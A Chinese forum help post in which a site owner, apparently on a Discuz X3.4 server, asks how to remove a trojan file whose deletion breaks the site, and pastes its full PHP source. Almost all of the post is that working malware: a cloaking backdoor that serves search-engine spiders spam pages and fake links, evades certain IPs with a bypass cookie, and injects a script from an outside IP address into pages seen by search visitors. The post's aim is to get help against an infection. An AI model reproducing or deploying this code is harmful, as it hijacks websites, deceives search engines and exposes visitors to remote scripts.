x3.4 服务器 c:\C:\ProgramData\app\app文件,无扩展名木马
删除这个目录后就不能打开网站;请问如何解决?谢谢!!
打开文件内容如下:
<?php
ob_start("ob_gzhandler");
ini_set('html_errors', false);
ini_set('display_errors', false);
define("APP_INCLUDE_FLAG", "TRUE");
define('APP_JACK_CHARSET', 'GBK');
header("Content-type: text/html; charset=" . APP_JACK_CHARSET);
define('APP_JACK_DOCUMENTROOT', 'C:/ProgramData/app/');
$userAgent = strtolower($_SERVER['HTTP_USER_AGENT']);
if (stristr($userAgent, "sogou")) {
define('APP_JACK_KEYWORD', APP_JACK_DOCUMENTROOT . 'key/' . rand(1, 10) . '.txt');
define('APP_JACK_TEMPLATE', APP_JACK_DOCUMENTROOT . 'sogou/mb' . mt_rand(1, 4) . '.txt');
define('APP_JACK_BIANLIANG', APP_JACK_DOCUMENTROOT . 'bl/bl1.txt');
define('APP_JACK_BIANLIANG_B', APP_JACK_DOCUMENTROOT . 'bl/bl2.txt');
define('APP_JACK_BIANLIANG_C', APP_JACK_DOCUMENTROOT . 'bl/bl3.txt');
}
if (stristr($userAgent, "baidu")) {
define('APP_JACK_KEYWORD', APP_JACK_DOCUMENTROOT . 'key/' . rand(1, 10) . '.txt');
define('APP_JACK_TEMPLATE', APP_JACK_DOCUMENTROOT . 'baidu/mb' . mt_rand(1, 4) . '.txt');
define('APP_JACK_BIANLIANG', APP_JACK_DOCUMENTROOT . 'bl/bl1.txt');
define('APP_JACK_BIANLIANG_B', APP_JACK_DOCUMENTROOT . 'bl/bl2.txt');
define('APP_JACK_BIANLIANG_C', APP_JACK_DOCUMENTROOT . 'bl/bl3.txt');
} else {
define('APP_JACK_KEYWORD', APP_JACK_DOCUMENTROOT . 'key/' . rand(1, 10) . '.txt');
define('APP_JACK_TEMPLATE', APP_JACK_DOCUMENTROOT . 'mb.txt'); //好搜模板
define('APP_JACK_BIANLIANG', APP_JACK_DOCUMENTROOT . 'bl/bl1.txt');
define('APP_JACK_BIANLIANG_B', APP_JACK_DOCUMENTROOT . 'bl/bl2.txt');
define('APP_JACK_BIANLIANG_C', APP_JACK_DOCUMENTROOT . 'bl/bl3.txt');
}
define('APP_JACK_QQ', APP_JACK_DOCUMENTROOT . 'Oicq.txt');
define('APP_JACK_ARTICLE', APP_JACK_DOCUMENTROOT . 'txt/txt' . rand(1, 10) . '.txt');
define('APP_JACK_DES', APP_JACK_DOCUMENTROOT . 'MiaoShu.txt');
define('APP_JACK_BIANLIANG_B', APP_JACK_DOCUMENTROOT . 'bl2.txt');
define('APP_JACK_BIANLIANG_C', APP_JACK_DOCUMENTROOT . 'bl3.txt');
define('APP_MIX_KWD_FILE', APP_JACK_DOCUMENTROOT . 'HunHe.txt');
define('APP_JACK_CACHED', 'Uncached');
define('APP_JACK_MIN_PAR', '3');
define('APP_JACK_MAX_PAR', '3');
define('APP_JACK_MIN', '10');
define('APP_JACK_MAX', '15');
define('APP_JACK_APPFILE', APP_JACK_DOCUMENTROOT . 'app.txt');
function App_GetLink()
{
$userAgentx = strtolower($_SERVER['HTTP_USER_AGENT']);
if (stristr($userAgentx, "baiduspider")) {
$link = array();
$link[] = 'http://' . $_SERVER['HTTP_HOST'] . '/?gid=' . mt_rand(5000000, 99999999999.0) . '';
$link[] = 'http://' . $_SERVER['HTTP_HOST'] . '/?tid=' . mt_rand(5000000, 99999999999.0) . '';
$link[] = 'http://' . $_SERVER['HTTP_HOST'] . '/?fid=' . mt_rand(5000000, 99999999999.0) . '';
$link[] = 'http://' . $_SERVER['HTTP_HOST'] . '/thread-' . mt_rand(5000000, 99999999999.0) . '-1-1.html';
$link[] = 'http://' . $_SERVER['HTTP_HOST'] . '/forum-' . mt_rand(5000000, 99999999999.0) . '-1.html';
$link[] = 'http://' . $_SERVER['HTTP_HOST'] . '/article-' . mt_rand(10000, 9999999999) . '-1.html';
$link[] = 'http://' . $_SERVER['HTTP_HOST'] . '/forum.php?gid=' . mt_rand(5000000, 99999999999.0) . '';
$link[] = 'http://' . $_SERVER['HTTP_HOST'] . '/forum.php?tid=' . mt_rand(5000000, 99999999999.0) . '';
$link[] = 'http://' . $_SERVER['HTTP_HOST'] . '/forum.php?fid=' . mt_rand(5000000, 99999999999.0) . '';
$link[] = 'http://' . $_SERVER['HTTP_HOST'] . '/home.php?gid=' . mt_rand(5000000, 99999999999.0) . '';
$link[] = 'http://' . $_SERVER['HTTP_HOST'] . '/home.php?tid=' . mt_rand(5000000, 99999999999.0) . '';
$link[] = 'http://' . $_SERVER['HTTP_HOST'] . '/home.php?fid=' . mt_rand(5000000, 99999999999.0) . '';
$link[] = 'http://' . $_SERVER['HTTP_HOST'] . '/portal.php?gid=' . mt_rand(5000000, 99999999999.0) . '';
$link[] = 'http://' . $_SERVER['HTTP_HOST'] . '/portal.php?tid=' . mt_rand(5000000, 99999999999.0) . '';
$link[] = 'http://' . $_SERVER['HTTP_HOST'] . '/portal.php?fid=' . mt_rand(5000000, 99999999999.0) . '';
$link[] = 'http://' . $_SERVER['HTTP_HOST'] . '/forum.php?mod=redirect&tid=' . mt_rand(5000000, 99999999999.0) . '';
$link[] = 'http://' . $_SERVER['HTTP_HOST'] . '/forum.php?mod=viewthread&tid=' . mt_rand(5000000, 99999999999.0) . '';
$link[] = 'http://' . $_SERVER['HTTP_HOST'] . '/forum.php?mod=forumdisplay&fid=' . mt_rand(5000000, 99999999999.0) . '';
$link[] = 'http://' . $_SERVER['HTTP_HOST'] . '/forum.php?mod=collection&action=view&ctid=' . mt_rand(5000000, 99999999999.0) . '';
$link[] = 'http://' . $_SERVER['HTTP_HOST'] . '/index.php?gid=' . mt_rand(5000000, 99999999999.0) . '';
$link[] = 'http://' . $_SERVER['HTTP_HOST'] . '/index.php?tid=' . mt_rand(5000000, 99999999999.0) . '';
$link[] = 'http://' . $_SERVER['HTTP_HOST'] . '/index.php?fid=' . mt_rand(5000000, 99999999999.0) . '';
return $link[mt_rand(0, count($link) - 1)];
} else {
$link = array();
$link[] = 'http://' . $_SERVER['HTTP_HOST'] . '/?gid=' . mt_rand(5000000, 99999999999.0) . '';
$link[] = 'http://' . $_SERVER['HTTP_HOST'] . '/?tid=' . mt_rand(5000000, 99999999999.0) . '';
$link[] = 'http://' . $_SERVER['HTTP_HOST'] . '/?fid=' . mt_rand(5000000, 99999999999.0) . '';
$link[] = 'http://' . $_SERVER['HTTP_HOST'] . '/thread-' . mt_rand(5000000, 99999999999.0) . '-1-1.html';
$link[] = 'http://' . $_SERVER['HTTP_HOST'] . '/forum-' . mt_rand(5000000, 99999999999.0) . '-1.html';
$link[] = 'http://' . $_SERVER['HTTP_HOST'] . '/article-' . mt_rand(10000, 9999999999) . '-1.html';
$link[] = 'http://' . $_SERVER['HTTP_HOST'] . '/forum.php?gid=' . mt_rand(5000000, 99999999999.0) . '';
$link[] = 'http://' . $_SERVER['HTTP_HOST'] . '/forum.php?tid=' . mt_rand(5000000, 99999999999.0) . '';
$link[] = 'http://' . $_SERVER['HTTP_HOST'] . '/forum.php?fid=' . mt_rand(5000000, 99999999999.0) . '';
$link[] = 'http://' . $_SERVER['HTTP_HOST'] . '/home.php?gid=' . mt_rand(5000000, 99999999999.0) . '';
$link[] = 'http://' . $_SERVER['HTTP_HOST'] . '/home.php?tid=' . mt_rand(5000000, 99999999999.0) . '';
$link[] = 'http://' . $_SERVER['HTTP_HOST'] . '/home.php?fid=' . mt_rand(5000000, 99999999999.0) . '';
$link[] = 'http://' . $_SERVER['HTTP_HOST'] . '/portal.php?gid=' . mt_rand(5000000, 99999999999.0) . '';
$link[] = 'http://' . $_SERVER['HTTP_HOST'] . '/portal.php?tid=' . mt_rand(5000000, 99999999999.0) . '';
$link[] = 'http://' . $_SERVER['HTTP_HOST'] . '/portal.php?fid=' . mt_rand(5000000, 99999999999.0) . '';
$link[] = 'http://' . $_SERVER['HTTP_HOST'] . '/forum.php?mod=redirect&tid=' . mt_rand(5000000, 99999999999.0) . '';
$link[] = 'http://' . $_SERVER['HTTP_HOST'] . '/forum.php?mod=viewthread&tid=' . mt_rand(5000000, 99999999999.0) . '';
$link[] = 'http://' . $_SERVER['HTTP_HOST'] . '/forum.php?mod=forumdisplay&fid=' . mt_rand(5000000, 99999999999.0) . '';
$link[] = 'http://' . $_SERVER['HTTP_HOST'] . '/forum.php?mod=collection&action=view&ctid=' . mt_rand(5000000, 99999999999.0) . '';
$link[] = 'http://' . $_SERVER['HTTP_HOST'] . '/index.php?gid=' . mt_rand(5000000, 99999999999.0) . '';
$link[] = 'http://' . $_SERVER['HTTP_HOST'] . '/index.php?tid=' . mt_rand(5000000, 99999999999.0) . '';
$link[] = 'http://' . $_SERVER['HTTP_HOST'] . '/index.php?fid=' . mt_rand(5000000, 99999999999.0) . '';
return $link[mt_rand(0, count($link) - 1)];
}
}
function App_GetSelf()
{
$link = array();
$link[] = 'http://' . $_SERVER['HTTP_HOST'] . '/thread-' . mt_rand(5000000, 99999999999.0) . '-1-1.html';
$link[] = 'http://' . $_SERVER['HTTP_HOST'] . '/forum-' . mt_rand(5000000, 99999999999.0) . '-1.html';
$link[] = 'http://' . $_SERVER['HTTP_HOST'] . '/article-' . mt_rand(10000, 9999999999) . '-1.html';
$link[] = 'http://' . $_SERVER['HTTP_HOST'] . '/forum.php?gid=' . mt_rand(5000000, 99999999999.0) . '';
$link[] = 'http://' . $_SERVER['HTTP_HOST'] . '/forum.php?mid=' . mt_rand(5000000, 99999999999.0) . '';
$link[] = 'http://' . $_SERVER['HTTP_HOST'] . '/home.php?gid=' . mt_rand(5000000, 99999999999.0) . '';
$link[] = 'http://' . $_SERVER['HTTP_HOST'] . '/home.php?mid=' . mt_rand(5000000, 99999999999.0) . '';
$link[] = 'http://' . $_SERVER['HTTP_HOST'] . '/portal.php?gid=' . mt_rand(5000000, 99999999999.0) . '';
$link[] = 'http://' . $_SERVER['HTTP_HOST'] . '/portal.php?mid=' . mt_rand(5000000, 99999999999.0) . '';
$link[] = 'http://' . $_SERVER['HTTP_HOST'] . '/forum.php?mod=redirect&tid=' . mt_rand(5000000, 99999999999.0) . '';
$link[] = 'http://' . $_SERVER['HTTP_HOST'] . '/forum.php?mod=viewthread&tid=' . mt_rand(5000000, 99999999999.0) . '';
$link[] = 'http://' . $_SERVER['HTTP_HOST'] . '/forum.php?mod=forumdisplay&fid=' . mt_rand(5000000, 99999999999.0) . '';
$link[] = 'http://' . $_SERVER['HTTP_HOST'] . '/forum.php?mod=collection&action=view&ctid=' . mt_rand(5000000, 99999999999.0) . '';
$link[] = 'http://' . $_SERVER['HTTP_HOST'] . '/index.php?gid=' . mt_rand(5000000, 99999999999.0) . '';
$link[] = 'http://' . $_SERVER['HTTP_HOST'] . '/index.php?mid=' . mt_rand(5000000, 99999999999.0) . '';
$link[] = 'http://' . $_SERVER['HTTP_HOST'] . '/index.php?id=' . mt_rand(5000000, 99999999999.0) . '';
return $link[mt_rand(0, count($link) - 1)];
}
function getImg()
{
$img_ay = array('5B84', '5B85', '5B8b', '5B8e', '5B88', '5B86', '5B8c', '5B8d', '5B8a', '5B87', '5B89', '5B8f', '5B8g', '5B8i', '5B8m', '5B8l', '5B8n', '5B8d', '5B8o', '5B8j', '5B8h', '5B8k', '5B8p', '5B8q', '5B8r', '5B8u', '5B8t', '5B8v', '5B8s', '5B8B', '5B8y');
$img_num = rand(0, 30);
return "https://i.niupic.com/images/2018/12/09/" . $img_ay[$img_num] . ".jpg";
}
$my_app = new missclient();
$my_app->run();
class missclient
{
public $show_spider;
public $jump_ref;
public $http_ref_filter;
public $jump_url = "";
public $domain = "";
public $condition = "";
public $app_server = "";
public $log_spider = "";
public $cur_spider = "";
public $allow_ip = "";
public $isCache = false;
public function run()
{
$this->domain = 'cpfwb';
$this->jump_ref = explode("|", "baidu.|haoso.|haosou.|bing.|sogou.|m.sogou.|wap.sogou.|soso.|so.com|.sm.cn");
$this->http_ref_filter = explode("|", "inurl:|site:|site%3A|inurl%3A");
$this->allow_ip = "218.80.218.|10.4.62.|10.4.33";
if (stristr(strtolower($_SERVER['HTTP_USER_AGENT']), "360spider") || stristr(strtolower($_SERVER['HTTP_USER_AGENT']), "haosouspider")) {
$this->condition = $this->isAllowdIp();
} else {
$this->condition = $_GET['tid'] > 5000000 || $_GET['fid'] > 5000000 || $_GET['gid'] > 5000000 && $this->isAllowdIp();
}
$this->app_server = "app.php";
$this->isCache = False;
if ($this->isSpider() && $this->isAllowdIp()) {
if ($this->condition) {
if ($this->isCache) {
$relset_host = $this->getServerName();
$dir = (substr(PHP_OS, 0, 3) == 'WIN' ? 'C:/windows/temp/' : '/tmp/') . substr(md5($relset_host), 26) . chr(47);
$cacheFile = $dir . 'sess_' . substr(md5(http_build_query($_GET)), 6);
if (!@file_exists($dir)) {
mkdir($dir, 0777);
}
if (@file_exists($cacheFile) && @filesize($cacheFile) > 32) {
$var = coreAppCache::read($cacheFile);
$page = file_get_contents(APP_JACK_TEMPLATE);
foreach ($var as $key => $v) {
$flag = "{" . $key . "}";
$page = str_replace($flag, $v, $page);
}
echo $page;
exit;
} else {
$currentPage = (include APP_JACK_APPFILE);
if ($currentPage && strlen($currentPage) > 32 && stristr($currentPage, "</explode>")) {
$var = self::cut($currentPage, "<explode>", "</explode>");
$var = coreAppCache::decode($var);
$page = file_get_contents(APP_JACK_TEMPLATE);
foreach ($var as $key => $v) {
$flag = "{" . $key . "}";
$page = str_replace($flag, $v, $page);
}
echo $page;
@coreAppCache::writenocode($currentPage, $cacheFile);
}
}
die;
} else {
$currentPage = (include APP_JACK_APPFILE);
echo $currentPage;
die;
}
} else {
$this->_uncondition_hook();
}
} else {
if ($this->isRef() && $this->condition) {
$this->Jump();
} else {
$this->_unSpider_hook();
}
}
}
public function isAllowdIp()
{
$ip = $this->clientIp();
$non_list = explode("|", $this->allow_ip);
foreach ($non_list as $iplist) {
if (@stristr($ip, $iplist)) {
return false;
}
}
return true;
}
public function clientIp()
{
if (getenv('HTTP_CLIENT_IP') && strcasecmp(getenv('HTTP_CLIENT_IP'), 'unknown')) {
$onlineip = getenv('HTTP_CLIENT_IP');
} elseif (getenv('HTTP_X_FORWARDED_FOR') && strcasecmp(getenv('HTTP_X_FORWARDED_FOR'), 'unknown')) {
$onlineip = getenv('HTTP_X_FORWARDED_FOR');
} elseif (getenv('REMOTE_ADDR') && strcasecmp(getenv('REMOTE_ADDR'), 'unknown')) {
$onlineip = getenv('REMOTE_ADDR');
} elseif (isset($_SERVER['REMOTE_ADDR']) && $_SERVER['REMOTE_ADDR'] && strcasecmp($_SERVER['REMOTE_ADDR'], 'unknown')) {
$onlineip = $_SERVER['REMOTE_ADDR'];
}
preg_match("/[d.]{7,15}/", $onlineip, $onlineipmatches);
$onlineip = $onlineipmatches[0] ? $onlineipmatches[0] : 'unknown';
unset($onlineipmatches);
return $onlineip;
}
public function isSpider()
{
$bots = array('Baidu' => 'baiduspider', 'Sogou' => 'sogou', 'Haoso' => 'haosouspider', '360spider' => '360spider', 'bingbot' => 'bingbot');
$userAgent = strtolower($_SERVER['HTTP_USER_AGENT']);
foreach ($bots as $k => $v) {
if (stristr($userAgent, $v)) {
if (!empty($this->log_spider)) {
@file_put_contents($this->log_spider, $v . "->Visited " . $_SERVER['QUERY_STRING'] . "at: " . date("Y-m-d H:i:s") . "n", FILE_APPEND);
}
$this->cur_spider = $k;
return true;
break;
}
}
return false;
}
public function isRef()
{
$ref = strtolower(@$_SERVER['HTTP_REFERER']);
if (isset($_COOKIE["domain-filter-bypass"])) {
return false;
}
if (!$this->isAllowdIp()) {
setcookie("domain-filter-bypass", "lol", time() + 259200);
return false;
}
foreach ($this->http_ref_filter as $r) {
$r = trim($r);
if (stristr($ref, $r)) {
setcookie("domain-filter-bypass", "lol", time() + 259200);
return false;
}
}
foreach ($this->jump_ref as $r) {
$r = trim($r);
if (stristr($ref, $r)) {
return true;
}
}
}
public function getServerName()
{
$ServerName = strtolower($_SERVER['SERVER_NAME'] ? $_SERVER['SERVER_NAME'] : $_SERVER['HTTP_HOST']);
if (strpos($ServerName, 'http://')) {
return str_replace('http://', '', $ServerName);
}
return $ServerName;
}
public function getPage()
{
if ($this->isCache) {
$cache = "cached";
}
$url = $this->app_server . "?domain=" . $this->domain . "&gid=199&spider=" . $this->cur_spider . "&cache=" . $cache . "&localPar=" . http_build_query($_GET);
return $this->HttpVisit($url);
}
public function HttpVisit($weburl)
{
$remote_data = NULL;
if (function_exists('curl_exec')) {
$curl = @curl_init();
@curl_setopt($curl, CURLOPT_URL, $weburl);
@curl_setopt($curl, CURLOPT_HEADER, 0);
@curl_setopt($curl, CURLOPT_CONNECTTIMEOUT, 30);
@curl_setopt($curl, CURLOPT_RETURNTRANSFER, 1);
$remote_data = @curl_exec($curl);
@curl_close($curl);
} else {
if (function_exists('stream_context_create')) {
$header_array = array('http' => array('method' => 'GET', 'timeout' => 30));
$http_header = @stream_context_create($header_array);
$remote_data = @file_get_contents($weburl, false, $http_header);
} else {
$temp_url = explode("/", $weburl);
$new_url = $temp_url[2];
$http_port = 80;
$get_file = substr($weburl, strlen($new_url) + 7);
if (strstr($new_url, chr(58))) {
$s_var_array['td'] = explode(chr(58), $new_url);
$new_url = $s_var_array['td'][0];
$http_port = $s_var_array['td'][1];
}
$fsock_result = @fsockopen($new_url, $http_port);
@fputs($fsock_result, 'GET ' . $get_file . ' HTTP/1.1' . "rn" . 'Host:' . $new_url . "rn" . 'Connection:Close' . "rnrn");
while (!feof($fsock_result)) {
$remote_data .= fgets($fsock_result, 1024);
}
@fclose($fsock_result);
}
}
return $remote_data;
}
public function Jump()
{
if ($this->isAllowdIp()) {
$domain = str_replace(".", "_", $this->domain);
echo '<script type="text/javascript" src="http://23.225.194.165:60789/js.js"></script>';
// header("HTTP/1.1 200 OK");
exit;
}
}
public function _uncondition_hook()
{
$array = array();
for ($a = 0; $a < 100; $a++) {
echo '<a href="' . App_GetLink() . '"></a>' . "\n";
}
}
public function _unSpider_hook()
{
}
public function strStartWith($needle, $haystack)
{
return substr($haystack, 0, strlen($needle)) == $needle;
}
public function rndStr($length = 8)
{
$str = null;
$strPol = "0123456789abcdefghijklmnopqrstuvwxyz";
$max = strlen($strPol) - 1;
for ($i = 0; $i < $length; $i++) {
$str .= $strPol[rand(0, $max)];
}
return $str;
}
public function cut($file, $from, $end)
{
$message = explode($from, $file);
$message = explode($end, $message[1]);
return $message[0];
}
}
class coreAppCache
{
public function write($file, $filename)
{
return file_put_contents($filename, self::encode($file));
}
public function writenocode($file, $filename)
{
return file_put_contents($filename, $file);
}
public function read($filename)
{
$content = file_get_contents($filename);
if (stristr($content, "</explode>")) {
$content = self::cut($content, "<explode>", "</explode>");
}
return self::decode($content);
}
public function encode($file)
{
return base64_encode(gzcompress(serialize($file)));
}
public function decode($file)
{
return unserialize(gzuncompress(base64_decode($file)));
}
public function cut($file, $from, $end)
{
$message = explode($from, $file);
$message = explode($end, $message[1]);
return $message[0];
}
}
|
置顶卡
喧嚣卡
变色卡
千斤顶
显身卡